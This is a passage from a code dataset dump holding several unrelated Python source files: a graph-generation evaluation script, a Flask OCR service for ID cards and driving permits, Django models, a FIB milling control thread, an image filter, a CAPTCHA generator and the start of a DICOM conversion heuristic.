clust. coef.\", color ='orange')\n# axs[1,0].set_xlabel(\"Percentage of |E|\")\n# axs[1,0].set_ylabel('Clust. Coef.')\n# # axs[1,0].legend()\n#\n# axs[1,1].plot([10*i for i in range(1,11,1)], gini_coef, label = \"gini coef.\", color = 'red',linestyle = 'dashed',marker = '*')\n# axs[1,1].plot([10*i for i in range(1,11,1)], [0.57105 for i in range(10)], label = \"real gini coef.\", color ='red')\n# axs[1,1].set_xlabel(\"Percentage of |E|\")\n# axs[1,1].set_ylabel('Gini Coef.')\n# axs[1,1].legend()\n#\n# # plt.ylabel(\"metric\")\n# #\n\n\n# #\n# plt.legend(loc='upper left')\n# plt.show()\n\nedge_list_syn = np.load('outputs/Synthetic_benchmark/EmailEUCore_our_vae_generated_graph.npy')\n # edge_list_syn.append((int(e[0]),int(e[1])))\n# import pdb; pdb.set_trace()\n# edge_list_syn = nx.from_edgelist('outputs/Synthetic_benchmark/Cora_NetGAN_generated_graph.npy',create_using=nx.DiGraph())\n\n#\nbase_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir, 'data')\n\n\n\n\n# sbm_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\n#\n# graphs = torch.load('datasets\\data\\direct_sbm_dataset.pt')\n\n# # # #\n# # #\n# graphs = StochasticBlockModelDataset(base_path,block_sizes = [400,400,400,400],edge_probs = [[0.15,0.01,0.01,0.01],\n# [0.01,0.15,0.01,0.01],\n# [0.01,0.01,0.15,0.01],\n# [0.01,0.01,0.01,0.15]])\n# #\n# graphs.data.num_nodes = 1600\n# print(graphs.data)\n# torch.save(graphs,'sbm_test_in_out_4_1600_nodes.pt')\n# qgf\n# graphs = torch.load('sbm_test_in_out_4_1600_nodes.pt')\n\n\n#\n# edge_list = [(int(i[0]), int(i[1])) for i in graphs.data.edge_index.transpose(0,1)]\n#\n# real_graph = nx.from_edgelist(edge_list, create_using=nx.Graph())\n# import pdb;pdb.set_trace()\n# graphs = Planetoid(\"\\..\", \"Cora\", transform=T.NormalizeFeatures())\n#import pdb;pdb.set_trace()\n\n# graphs = AttributedGraphDataset(base_path,\"Wiki\")\ngraphs = EmailEUCore(base_path)\n# graphs = SNAPDataset(base_path,\"ego-facebook\").get(1)\n#\n#\n#\n# graphs.data = Data(x=graphs.x, edge_index=graphs.edge_index, 
n_nodes=graphs.num_nodes)\nprint(graphs.data)\n# data = dataset[0]\n# data.train_mask = data.val_mask = data.test_mask = data.y = None\n# data = train_test_split_edges(data)\n\n# print(data)\n\n#sum(nx.triangles(G).values()) / 3\n\n#syn_graph = nx.from_edgelist(random.choices(list(set(edge_list_syn)),k=27000), create_using=nx.Graph())\ndir = False\nif dir == True:\n\n syn_graph = nx.from_edgelist(edge_list_syn, create_using=nx.DiGraph())\n\n edge_list = [(int(i[0]), int(i[1])) for i in graphs.data.edge_index.transpose(0,1)]\n # syn_graph = nx.from_edgelist(edge_list)\n\n real_graph = nx.from_edgelist(edge_list, create_using=nx.DiGraph())\n\n print(len(list(syn_graph.nodes())))\n print(len(list(syn_graph.edges())))\nif dir == False:\n\n syn_graph = nx.from_edgelist(edge_list_syn, create_using=nx.Graph())\n graphs.data.edge_index = to_undirected(graphs.data.edge_index)\n edge_list_tensor = to_undirected(graphs.data.edge_index)\n edge_list_tensor = edge_list_tensor.transpose(0,1)\n\n edge_list = [(int(i[0]),int(i[1])) for i in edge_list_tensor]\n # syn_graph = nx.from_edgelist(edge_list)\n real_graph = nx.from_edgelist(edge_list)\n print(graphs)\n print(len(list(syn_graph.nodes())))\n\n print(len(list(syn_graph.edges())))\n\nprint(compute_graph_statistics(real_graph))\n\nprint(compute_graph_statistics(syn_graph))\n\n\n\n#\n# print(f'Number of triangles in the real graph: {sum(nx.triangles(real_graph.to_undirected()).values()) / 3}')\n# print(f'Number of triangles in the synthetic graph: {sum(nx.triangles(syn_graph.to_undirected()).values()) / 3}')\n#\n# print(f'Assortativity in the real graph: {nx.degree_assortativity_coefficient(real_graph)}')\n# print(f'Assortativity in the synthetic graph: {nx.degree_assortativity_coefficient(syn_graph)}')\n#\n# print(f'Clustering coef in the real graph: {nx.average_clustering(real_graph)}')\n# print(f'Clustering coef in the synthetic graph: {nx.average_clustering(syn_graph)}')\n#\n# degree_sequence_syn = sorted((d for n, d in syn_graph.degree()), reverse=True)\n# degree_sequence_real = sorted((d for n, d in real_graph.degree()), reverse=True)\n#\n# #\n# k_core_syn = sorted((d for n, d in nx.core_number(syn_graph.remove_edges_from(nx.selfloop_edges(syn_graph)))), reverse=True)\n# k_core_real = sorted((d for n, d in nx.core_number(real_graph.remove_edges_from(nx.selfloop_edges(real_graph)))), reverse=True)\n#\n# print(f'core number in the real graph: {max(k_core_real)}')\n# print(f'core number in the synthetic graph: {max(k_core_syn)}')\n#\n#\n# print(f'number of squares in the real graph: {squares(real_graph)}')\n# print(f'number of squares in the synthetic graph: {squares(syn_graph)}')\n#\n#\n#\n#\n# print(f'Max degree coef in the real graph: {max(degree_sequence_real)}')\n# print(f'Max degree coef in the synthetic graph: {max(degree_sequence_syn)}')\n\n\n\n\nimport pdb;pdb.set_trace()\n\nreal_torch_graph = torch.tensor(np.array(list(real_graph.edges())).T,dtype=torch.long)\n\n\nreal_data = Data(edge_index = real_torch_graph, num_nodes = graphs.data.num_nodes)\n\ndegree_sequence_syn = sorted((d for n, d in syn_graph.degree()), reverse=True)\nsyn_distrib = np.unique(degree_sequence_syn)*1./(sum(np.unique(degree_sequence_syn)))\n\n\ndegree_sequence_real = sorted((d for n, d in real_graph.degree()), reverse=True)\nreal_distrib = np.unique(degree_sequence_real) * 1. 
/ (sum(np.unique(degree_sequence_real)))\n\n#syn_torch_graph = from_networkx(syn_graph)\n\nsyn_torch_graph = torch.tensor(np.array(list(syn_graph.edges())).T,dtype=torch.long)\n\nsyn_torch_graph = Data(edge_index = syn_torch_graph, num_nodes = graphs.data.num_nodes)\n\n#syn_torch_graph.edge_index = to_undirected(syn_torch_graph.edge_index)\n\n# import numpy as np\n# import matplotlib.pyplot as plt\n# fig = plt.figure(\"Degree of a random graph\", figsize=(8, 8))\n#\n# axgrid = fig.add_gridspec(5, 4)\n# ax2 = fig.add_subplot(axgrid[0:3,:])\n# ax2.bar(*np.unique(degree_sequence_syn, return_counts=True),color='red',label='Synthetic Graph')\n# ax2.bar(*np.unique(degree_sequence_real, return_counts=True),label = 'Real Graph')\n# ax2.set_title(\"Degree histogram\")\n# ax2.set_xlabel(\"Degree\")\n# ax2.set_ylabel(\"Number of Nodes\")\n# ax2.legend()\n# fig.tight_layout()\n# plt.show()\n\nprint(syn_torch_graph)\n\n\nprint(real_data)\nsyn_torch_graph = syn_torch_graph\n\nsyn_torch_graph.num_nodes=graphs.data.num_nodes\n\nsyn_torch_graph.x=torch.eye(graphs.data.num_nodes, dtype = torch.float32)#*1./graphs.data.num_nodes\n\ndata = train_test_split_edges(syn_torch_graph)\n\nprint(data.x)\n\nclass GCNEncoder(torch.nn.Module):\n def __init__(self, in_channels, out_channels):\n super(GCNEncoder, self).__init__()\n self.conv1 = GCNConv(in_channels, 2 * out_channels, cached=True) # cached only for transductive learning\n self.conv2 = GCNConv(2 * out_channels, out_channels, cached=True) # cached only for transductive learning\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index).relu()\n return self.conv2(x, edge_index)\n\n\nfrom torch_geometric.nn import VGAE\nfrom torch_geometric.nn import GAE\n#\n# out_channels = 2\n# num_features = 20\n# epochs = 100\n#\n# # model\n# model = GAE(GCNEncoder(num_features, out_channels))\n#\n# # move to GPU (if available)\n# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n# model = model.to(device)\n# x = data.x.to(device)\n# train_pos_edge_index = data.train_pos_edge_index.to(device)\n#\n# # inizialize the optimizer\n# optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\n\ndef train():\n model.train()\n optimizer.zero_grad()\n z = model.encode(x, train_pos_edge_index)\n loss = model.recon_loss(z, train_pos_edge_index)\n\n loss = loss + (1 / data.num_nodes) * model.kl_loss() # new line\n loss.backward()\n optimizer.step()\n return float(loss)\n\n\ndef test(pos_edge_index, neg_edge_index):\n model.eval()\n with torch.no_grad():\n z = model.encode(x, train_pos_edge_index)\n return model.test(z, pos_edge_index, neg_edge_index)\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass VariationalGCNEncoder(torch.nn.Module):\n def __init__(self, in_channels, out_channels):\n super(VariationalGCNEncoder, self).__init__()\n self.conv1 = GCNConv(in_channels, 2 * out_channels, cached=True) # cached only for transductive learning\n self.conv_mu = GCNConv(2 * out_channels, out_channels, cached=True)\n self.conv_logstd = GCNConv(2 * out_channels, out_channels, cached=True)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index).relu()\n return self.conv_mu(x, edge_index), self.conv_logstd(x, edge_index)\n\nout_channels = 2\nnum_features = graphs.data.num_nodes\nepochs = 300\nprint('la')\n\nmodel = VGAE(VariationalGCNEncoder(num_features, out_channels)) # new line\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = model.to(device)\nx = data.x.to(device)\ntrain_pos_edge_index = 
data.train_pos_edge_index.to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\nwriter = SummaryWriter('runs/VGAE_experiment_' + '2d_100_epochs')\n\nprint('la')\ngraphs.data.x = torch.tensor([[1] for i in range(graphs.data.num_nodes)], dtype = torch.float32)\n\n\ndata_real = train_test_split_edges(real_data.to(device), test_ratio = 0.9)\n\nfor epoch in range(1, epochs + 1):\n loss = train()\n auc, ap = test(data.test_pos_edge_index, data.test_neg_edge_index)\n print('Epoch: {:03d}, AUC: {:.4f}, AP: {:.4f}'.format(epoch, auc, ap))\n\n writer.add_scalar('auc train', auc, epoch) # new line\n writer.add_scalar('ap train', ap, epoch) # new line\n\nauc, ap = test(data_real.test_pos_edge_index, data_real.test_neg_edge_index)\nprint('Final test vs real, AUC: {:.4f}, AP: {:.4f}'.format(auc, ap))\n\nqewf\na = model.decoder.forward_all(model.encode(x,train_pos_edge_index))\n\nuni = np.random.uniform(0,35,num_features*num_features).reshape(num_features,num_features)\nb = torch.tensor(uni)<=a.cpu()\nG =nx.from_numpy_matrix(np.array(b*1))\nG.remove_edges_from(nx.selfloop_edges(G))\nedge_list_samples = list(G.edges())\n\n\n\nwith open('vgae_eucore_edge_list.pkl', 'wb') as f:\n pickle.dump(edge_list_samples, f)\n\n\nimport pdb; pdb.set_trace()\n\n\n\n\n\n\n","repo_name":"Slimnios/SaGess","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":15690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6335505422","text":"# create hello world flask app in python3\nfrom flask import Flask, request\nfrom flask_cors import CORS\nimport cv2\nimport numpy as np\nimport pytesseract\n\n\ncustom_config = r'--oem 3 --psm 6'\n\napp = Flask(__name__)\nCORS(app)\n\n\n# class Field having 4 coordinates\nclass Field:\n def __init__(self, x1_percent, y1_percent, x2_percent, y2_percent):\n self.x1_percent = x1_percent\n self.y1_percent = y1_percent\n self.x2_percent = x2_percent\n self.y2_percent = y2_percent\n\n def drawRect(self, output):\n x1 = int(output.shape[1] * self.x1_percent / 100)\n y1 = int(output.shape[0] * self.y1_percent / 100)\n x2 = int(output.shape[1] * self.x2_percent / 100)\n y2 = int(output.shape[0] * self.y2_percent / 100)\n cv2.rectangle(output, (x1, y1), (x2, y2), (0, 255, 0), 2)\n\n def getCroppedImage(self, output):\n x1 = int(output.shape[1] * self.x1_percent / 100)\n y1 = int(output.shape[0] * self.y1_percent / 100)\n x2 = int(output.shape[1] * self.x2_percent / 100)\n y2 = int(output.shape[0] * self.y2_percent / 100)\n return output[y1:y2, x1:x2]\n\n def getDataInIt(self, image):\n return pytesseract.image_to_string(self.getCroppedImage(image), config=custom_config).strip()\n\n\n# get grayscale image\ndef get_grayscale(image):\n return cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# noise removal\n\n\ndef remove_noise(image):\n return cv2.medianBlur(image, 5)\n\n# thresholding\n\n\ndef thresholding(image):\n return cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n\n# dilation\n\n\ndef dilate(image):\n kernel = np.ones((5, 5), np.uint8)\n return cv2.dilate(image, kernel, iterations=1)\n\n# erosion\n\n\ndef erode(image):\n kernel = np.ones((5, 5), np.uint8)\n return cv2.erode(image, kernel, iterations=1)\n\n# opening - erosion followed by dilation\n\n\ndef opening(image):\n kernel = np.ones((5, 5), np.uint8)\n return cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel)\n\n# canny edge detection\n\n\ndef canny(image):\n return cv2.Canny(image, 100, 200)\n\n# skew 
correction\n\n\ndef deskew(image):\n    coords = np.column_stack(np.where(image > 0))\n    angle = cv2.minAreaRect(coords)[-1]\n    if angle < -45:\n        angle = -(90 + angle)\n    else:\n        angle = -angle\n    (h, w) = image.shape[:2]\n    center = (w // 2, h // 2)\n    M = cv2.getRotationMatrix2D(center, angle, 1.0)\n    rotated = cv2.warpAffine(\n        image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n    return rotated\n\n# template matching\n\n\ndef match_template(image, template):\n    return cv2.matchTemplate(image, template, cv2.TM_CCOEFF_NORMED)\n\n\ndef readAndTransformImage(imageFromRequest):\n    numpyImage = np.fromfile(imageFromRequest, np.uint8)\n    file = cv2.imdecode(numpyImage, cv2.IMREAD_COLOR)\n\n    image = get_grayscale(file)\n    image = cv2.threshold(image, 127, 255, 0)[1]\n\n    return image\n\n\ndef getCinFront(requestFile):\n    image = readAndTransformImage(requestFile)\n\n    # coordinates of the 4 fields large space\n    nameField = Field(0, 31, 50, 38)\n    familyNameField = Field(0, 44, 50, 51)\n    dateField = Field(20, 50, 40, 57)\n    placeField = Field(2, 64, 50, 71)\n    validDateField = Field(25, 70, 45, 77)\n    idField = Field(68, 76, 88, 83)\n\n    name = nameField.getDataInIt(image)\n    familyName = familyNameField.getDataInIt(image)\n    date = dateField.getDataInIt(image)\n    place = placeField.getDataInIt(image)\n    validDate = validDateField.getDataInIt(image)\n    id = idField.getDataInIt(image)\n\n    return {\n        'name': name,\n        'familyName': familyName,\n        'date': date,\n        'place': place,\n        'validDate': validDate,\n        'id': id\n    }\n\n\ndef getCinBack(requestFile):\n    image = readAndTransformImage(requestFile)\n\n    # coordinates of the 4 fields large space\n    idField = Field(10, 2, 22, 8)\n    validDateField = Field(65, 2, 80, 9)\n    fatherNameField = Field(12, 23, 60, 29)\n    motherNameField = Field(10, 29, 60, 36)\n    addressField = Field(12.3, 48, 75, 56)\n    maritalStatusField = Field(20, 60, 40, 68)\n    genderField = Field(80, 60, 88, 68)\n\n    id = idField.getDataInIt(image)\n    validDate = validDateField.getDataInIt(image)\n    fatherName = fatherNameField.getDataInIt(image)\n    motherName = motherNameField.getDataInIt(image)\n    address = addressField.getDataInIt(image)\n    maritalStatus = maritalStatusField.getDataInIt(image)\n    gender = genderField.getDataInIt(image)\n\n    return {\n        'id': id,\n        'validDate': validDate,\n        'fatherName': fatherName,\n        'motherName': motherName,\n        'address': address,\n        'maritalStatus': maritalStatus,\n        'gender': gender,\n    }\n\n\ndef getPermisFront(requestFile):\n    image = readAndTransformImage(requestFile)\n\n    nameField = Field(37, 33, 70, 39)\n    familyNameField = Field(37, 49, 70, 55)\n    dateField = Field(37, 60, 
70, 66)\n placeField = Field(37, 71, 70, 76)\n deliveryPlaceField = Field(49, 81, 70, 85)\n deliveryDateField = Field(45, 85, 63, 91)\n permisTypeField = Field(39, 92, 42.5, 98)\n permisNumberField = Field(69, 18, 85, 24)\n CINField = Field(80, 60, 95, 66)\n\n name = nameField.getDataInIt(image)\n familyName = familyNameField.getDataInIt(image)\n date = dateField.getDataInIt(image)\n place = placeField.getDataInIt(image)\n deliveryPlace = deliveryPlaceField.getDataInIt(image)\n deliveryDate = deliveryDateField.getDataInIt(image)\n permisType = permisTypeField.getDataInIt(image)\n permisNumber = permisNumberField.getDataInIt(image)\n CIN = CINField.getDataInIt(image)\n\n return {\n 'name': name,\n 'familyName': familyName,\n 'date': date,\n 'place': place,\n 'deliveryPlace': deliveryPlace,\n 'deliveryDate': deliveryDate,\n 'permisType': permisType,\n 'permisNumber': permisNumber,\n 'CIN': CIN,\n }\n\n\ndef getPermisBack(requestFile):\n image = readAndTransformImage(requestFile)\n\n endOfValidity = Field(11, 63, 29, 70)\n smallSerie = Field(5, 73, 35, 80)\n largeSerie = Field(3, 86, 97, 97)\n\n endOfValidity = endOfValidity.getDataInIt(image)\n smallSerie = smallSerie.getDataInIt(image)\n largeSerie = largeSerie.getDataInIt(image)\n\n return {\n 'endOfValidity': endOfValidity,\n 'smallSeries': smallSerie,\n 'largeSeries': largeSerie,\n }\n\n\n# handle post request having image in request data\n# return the same image in response\n@app.route(\"/api\", methods=['POST'])\ndef mainAPI():\n result = dict()\n\n if \"CIN1\" in request.files:\n file_CIN1 = request.files[\"CIN1\"]\n result[\"CIN1\"] = getCinFront(file_CIN1)\n\n if \"CIN2\" in request.files:\n file_CIN2 = request.files[\"CIN2\"]\n result[\"CIN2\"] = getCinBack(file_CIN2)\n if \"PERMIS1\" in request.files:\n file_PERMIS1 = request.files[\"PERMIS1\"]\n result[\"PERMIS1\"] = getPermisFront(file_PERMIS1)\n\n if \"PERMIS2\" in request.files:\n file_PERMIS2 = request.files[\"PERMIS2\"]\n result[\"PERMIS2\"] = getPermisBack(file_PERMIS2)\n\n # print(result)\n\n # print(result)\n\n return {\n 'status': 'success',\n 'result': result\n }\n\n@app.route(\"/api/test\", methods=['GET'])\ndef testAPI():\n return {\n 'status': 'success',\n 'result': 'test'\n }\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')","repo_name":"Diettrich/NARSA-doc-reader","sub_path":"python-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17445953667","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\n# Create your models here.\nclass Driver(models.Model):\n\n first_name = models.CharField(max_length=40)\n last_name = models.CharField(max_length=40)\n email = models.EmailField()\n date_hired = models.DateField()\n date_fired = models.DateField(null=True)\n active = models.BooleanField(default=True)\n profile = models.ImageField(upload_to='profiles_driver/')\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return f'{self.first_name} {self.last_name}'\n\n\nclass HistoryDriver(models.Model):\n message = models.TextField(max_length=500)\n created_at = models.DateTimeField(auto_now_add=True)\n active = models.BooleanField(default=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return 
self.message\n","repo_name":"razvantr/Final_Project","sub_path":"driver/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21802739606","text":"from PyQt5.QtCore import QThread, QMutex, QWaitCondition\n\nfrom lib.DIC_lib import *\n\n\nclass FibProcessThread(QThread):\n def __init__(self, xml, preset=\"2. Fine milling, polishing\", parent=None):\n \"\"\"\n Constructor.\n\n :param xml: xml text\n :param preset: preset\n :param parent: parent\n \"\"\"\n\n QThread.__init__(self, parent)\n\n self.preset = preset\n self.parent = parent\n self.xml = xml\n\n def __del__(self):\n self.wait()\n\n def run(self):\n \"\"\"\n Runs an DrawBeam external xml layer in a new thread according to SharkSEM Remote Control DrawBeam Extension.\n \"\"\"\n\n self.connection = self.parent.connection\n\n # parsing the xml text\n layer = parseString(self.xml)\n\n # get settings from xml layer\n self.settings = layer.getElementsByTagName(\"Settings\")[0]\n\n # set view field\n wf = float(self.settings.getAttribute(\"WriteFieldSize\")) # in meters\n\n self.connection.logger.info(\"Setting write field to %.1f um\" % (wf * 1e6))\n self.connection.FibSetViewField(wf * 1e3) # conversion to mm\n\n while self.parent.ProcessTab.paused:\n time.sleep(0.1)\n\n # check if fib is ready\n self.connection.checkFibCfg()\n\n # check if preset exists\n presets = self.connection.FibListPresets()\n if presets.count(self.preset) > 0:\n self.connection.logger.info(\"changing preset to : %s\" % self.preset)\n self.connection.FibSetPreset(self.preset)\n else:\n raise FibError(\"The FIB preset: %s doesn't exist\" % self.preset)\n\n FCC = self.connection.FibReadFCCurr() # in pA\n self.connection.logger.info(\"Faraday cup current = %f pA\" % FCC)\n\n # update beam current in xml project to actual value for time estimation correction\n if FCC <= 0:\n # in demo mode no current detected - 100pA set in such a case\n self.connection.logger.info(\"Demo mode detected,FC current increased 100x to value = %e pA\" % (\n float(self.settings.getAttribute(\"BeamCurrent\")) * 100 * 1e12))\n self.settings.setAttribute(\"BeamCurrent\", \"%e\" % (float(self.settings.getAttribute(\"BeamCurrent\")) * 100))\n else:\n self.connection.logger.info(\"Beam current=0. Updating layer current from %s A to %.2e A\" % (\n self.settings.getAttribute(\"BeamCurrent\"), FCC * 1e-12))\n self.settings.setAttribute(\"BeamCurrent\", \"%.2e\" % (FCC * 1e-12))\n\n while self.parent.ProcessTab.paused:\n time.sleep(0.1)\n\n \n\n # generating updated xml text\n xml = layer.toxml()\n self.connection.logger.debug(xml)\n self.connection.logger.info(\"Unloading layer with status: %i\" % self.connection.DrwUnloadLayer(0))\n self.connection.logger.info(\"Loading layer into DrawBeam with status:%i\" % (\n self.connection.DrwLoadLayer(0, xml)))\n self.connection.logger.debug(\"Any previous process is stopped ?? 
with status:%i\" % (self.connection.DrwStop()))\n self.connection.logger.info(\"Layer started with status:%i\" % (self.connection.DrwStart(0)))\n\n status = self.connection.DrwGetStatus()\n\n self.connection.logger.info(\"Drawbeam thread Status:%i\" % (status[0]))\n\n while status[0] == 2 or status[0] == 3: # means layer is running or paused\n while self.parent.ProcessTab.paused:\n time.sleep(0.1)\n\n try:\n self.connection.logger.debug(\"\"\"Layer progress: Time: %.2f s / %.2f s ()\"\"\" % (status[2], status[1]))\n time.sleep(0.2)\n status = self.connection.DrwGetStatus()\n\n if status[0] == 1: # layer finished\n self.connection.logger.debug(\"Drawbeam Status: Layer Finished\")\n # self.terminate()\n\n if status[0] == 3:\n self.connection.logger.debug(\"Drawbeam Status: Layer paused\")\n time.sleep(1)\n else:\n self.connection.logger.debug(\"Drawbeam Status: running\")\n time.sleep(0.5)\n\n except KeyboardInterrupt:\n self.connection.logger.error(\"Keyboard Interrupt\")\n self.connection.logger.info(\"Layer stopped with status:%i\" % (self.connection.DrwStop()))\n self.connection.logger.info(\"Unloading layer with status:\", self.connection.DrwUnloadLayer(0))\n self.terminate()\n","repo_name":"JurriDluggi/AutoDIC","sub_path":"FibProcess.py","file_name":"FibProcess.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74273008857","text":"from .._tier0 import execute\nfrom .._tier0 import plugin_function\nfrom .._tier0 import Image\n\n@plugin_function(categories=['filter', 'in assistant'], priority=-1)\ndef exponential(source : Image, destination : Image = None) -> Image:\n \"\"\"Computes base exponential of all pixels values.\n \n f(x) = exp(x) \n \n Author(s): Peter Haub, Robert Haase\n \n Parameters\n ----------\n source : Image\n destination : Image, optional\n \n Returns\n -------\n destination\n \n Examples\n --------\n >>> import pyclesperanto_prototype as cle\n >>> cle.exponential(source, destination)\n \n References\n ----------\n .. 
[1] https://clij.github.io/clij2-docs/reference_exponential\n    \"\"\"\n\n\n    parameters = {\n        \"src\":source,\n        \"dst\":destination\n    }\n\n    execute(__file__, '../clij-opencl-kernels/kernels/exponential_' + str(len(destination.shape)) + 'd_x.cl', 'exponential_' + str(len(destination.shape)) + 'd', destination.shape, parameters)\n    return destination\n","repo_name":"clEsperanto/pyclesperanto_prototype","sub_path":"pyclesperanto_prototype/_tier1/_exponential.py","file_name":"_exponential.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"68"} +{"seq_id":"33967979524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: liux\nDate: 2018/8/6 14:03\nPurpose: randomly generate distinct CAPTCHA images\n\"\"\"\n\n\nimport random\nimport os\nfrom PIL import ImageDraw,ImageFont,Image,ImageFilter\n\n\nPATH=os.getcwd()\n# You need to supply Arial.ttf yourself; Windows usually ships it at C:\\\\Windows\\\\Fonts\\\\Arial.ttf\nfont_file_path=PATH+'/pyUtils/fontSysFiles/Arial.ttf'\n\ndef random_check_code(width=120,height=30,char_length=5):\n    code = []\n    # Background color, white by default\n    img = Image.new(mode='RGB', size=(width, height), color=(255, 255, 255))\n    draw = ImageDraw.Draw(img, mode='RGB')\n\n    def rndChar():\n        \"\"\"\n        Generate a random letter\n        :return:\n        \"\"\"\n        return chr(random.randint(65, 90))\n\n    def rndColor():\n        \"\"\"\n        Generate a random color\n        :return:\n        \"\"\"\n        return (random.randint(0, 255), random.randint(10, 255), random.randint(64, 255))\n\n    # Draw the characters\n    font = ImageFont.truetype(font_file_path, 25)\n    # font = ImageFont.load_default().font\n    for i in range(char_length):\n        char = rndChar()\n        code.append(char)\n        h = random.randint(0, 4)\n        draw.text([i * width / char_length, h], char, font=font, fill=rndColor())\n\n    # Draw interference dots\n    for i in range(40):\n        draw.point([random.randint(0, width), random.randint(0, height)], fill=rndColor())\n\n    # Draw interference arcs\n    for i in range(40):\n        draw.point([random.randint(0, width), random.randint(0, height)], fill=rndColor())\n        x = random.randint(0, width)\n        y = random.randint(0, height)\n        draw.arc((x, y, x + 4, y + 4), 0, 90, fill=rndColor())\n\n    # Draw interference lines\n    for i in range(5):\n        x1 = random.randint(0, width)\n        y1 = random.randint(0, height)\n        x2 = random.randint(0, width)\n        y2 = random.randint(0, height)\n        draw.line((x1, y1, x2, y2), fill=rndColor())\n\n    img = img.filter(ImageFilter.EDGE_ENHANCE_MORE) # apply a filter to add more color variation\n    return img, ''.join(code)","repo_name":"LiuX666/Python_practice","sub_path":"loginCheckCode/pyUtils/randomCheckCode.py","file_name":"randomCheckCode.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"27472388045","text":"import os, re, glob\nfrom frozendict import frozendict\nimport nibabel.nicom.dicomwrappers as nb_dw\nfrom heudiconv.heuristics import reproin\nfrom heudiconv.heuristics.reproin import (\n    OrderedDict,\n    create_key,\n    get_dups_marked,\n    parse_series_spec,\n    sanitize_str,\n    lgr,\n    series_spec_fields,\n)\n\ndef load_example_dcm(seqinfo):\n    ex_dcm_path = sorted(glob.glob(os.path.join('/tmp', 'heudiconv*', '*', seqinfo.dcm_dir_name, seqinfo.example_dcm_file)))[0]\n    return nb_dw.wrapper_from_file(ex_dcm_path)\n\ndef custom_seqinfo(wrapper, series_files):\n    #print('calling custom_seqinfo', wrapper, series_files)\n\n    pedir_pos = None\n    if hasattr(wrapper, 'csa_header'):\n        pedir_pos = wrapper.csa_header[\"tags\"][\"PhaseEncodingDirectionPositive\"][\"items\"]\n        pedir_pos = pedir_pos[0] if len(pedir_pos) else None\n    custom_info = frozendict({\n        'patient_name': 
wrapper.dcm_data.PatientName,\n 'pe_dir': wrapper.dcm_data.get('InPlanePhaseEncodingDirection', None),\n 'pe_dir_pos': pedir_pos,\n 'body_part': wrapper.dcm_data.get(\"BodyPartExamined\", None),\n 'scan_options': str(wrapper.dcm_data.get(\"ScanOptions\", None)),\n 'image_comments': wrapper.dcm_data.get(\"ImageComments\", \"\"),\n 'slice_orient': str(wrapper.dcm_data.get([0x0051,0x100e]).value),\n 'echo_number': str(wrapper.dcm_data.get(\"EchoNumber\", None)),\n 'rescale_slope': wrapper.dcm_data.get(\"RescaleSlope\", None),\n })\n return custom_info\n\ndef infotoids(seqinfos, outdir):\n\n seqinfo = next(seqinfos.__iter__())\n\n #ex_dcm = load_example_dcm(seqinfo)\n\n pi = str(seqinfo.referring_physician_name)\n study_name = str(seqinfo.study_description)\n patient_name = str(seqinfo.custom['patient_name'])\n\n study_path = study_name.split(\"^\")\n\n rema = re.match(\"(([^_]*)_)?(([^_]*)_)?p([0-9]*)_([a-zA-Z]*)([0-9]*)\", patient_name)\n if rema is None:\n rema = re.match(\"(([^_]*)_)?(([^_]*)_)?(dev)_([a-zA-Z]*)([0-9]*)\", patient_name)\n if rema:\n study_name = rema.group(1)\n sub_study_name = rema.group(3)\n subject_id = rema.group(5)\n session_type = rema.group(6)\n session_id = rema.group(7)\n\n if rema is None:\n rema = re.match(\"(([^_]*)_)?([a-zA-Z0-9]*)_([a-zA-Z0-9]*)\", patient_name)\n study_name = rema.group(2)\n subject_id = rema.group(3)\n session_id = rema.group(4)\n\n locator = os.path.join(pi, *study_path)\n\n return {\n# \"locator\": locator,\n # Sessions to be deduced yet from the names etc TODO\n \"session\": session_id,\n \"subject\": subject_id,\n }\n\n\ndef get_task(s):\n mtch = re.match(\".*_task\\-([^_]+).*\", s.series_id)\n if mtch is None:\n mtch = re.match(\".*\\-task_([^_]+).*\", s.series_id)# for floc messup\n if mtch is not None:\n task = mtch.group(1).split(\"-\")\n if len(task) > 1:\n return task[1]\n return task[0]\n else:\n return None\n\n\ndef get_run(s):\n mtch = re.match(\".*run\\-([^_]+).*\", s.series_id)\n if mtch is not None:\n return mtch.group(1)\n else:\n return None\n\n\nrec_exclude = [\n \"ORIGINAL\",\n \"PRIMARY\",\n \"M\",\n \"P\",\n \"MB\",\n \"ND\",\n \"MOSAIC\",\n \"NONE\",\n 